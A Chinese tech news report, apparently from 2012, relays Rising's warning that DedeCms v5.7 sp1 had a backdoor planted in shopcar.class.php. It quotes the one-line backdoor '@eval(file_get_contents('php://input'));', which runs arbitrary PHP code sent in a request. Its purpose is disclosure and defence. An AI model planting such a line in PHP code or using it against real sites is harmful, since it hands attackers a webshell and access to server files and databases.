騰訊科技訊 3月22日消息，瑞星公司今日對外發布緊急警示：國內知名的PHP開源網站管理系統——織夢CMS（DedeCms）v5.7 sp1版本被發現植入后門，黑客可通過此后門直接獲得網站的控制權限，獲取存儲在服務器上的文件和數據庫。

據CMS官方數據顯示，目前約有70萬網站使用該系統搭建，涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員，使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

據瑞星專家介紹，織夢CMS（Dedecms） v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門，黑客只需要構造簡單的數據包提交到服務器，就能夠獲取到該網站的WebShell，通過對服務器進一步滲透攻擊，進而獲取服務器的最高權限。

在黑客攻陷網站后，便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統，此后門或將導致大量用戶的信息泄露，造成極為嚴重的影響。

　　推薦閱讀

　　全新酷狗電臺 邂逅音樂精彩

隨著Pandora網絡電臺在國外掀起一陣新的聽電臺熱潮，國內領先的數字音樂廠商酷狗音樂亦推出了其電臺產品， 基于酷狗龐大的音樂曲庫，結合人工多維度地細致分類，通過收集用戶行為進行算法優化等推薦方法向用戶提供優>>>詳細閱讀

本文標題：瑞星：織夢CMS系統現后門70萬網站資料恐不保

地址：http://www.sdlzkt.com/a/kandian/20120322/43160.html

 1/2    1  2 下一頁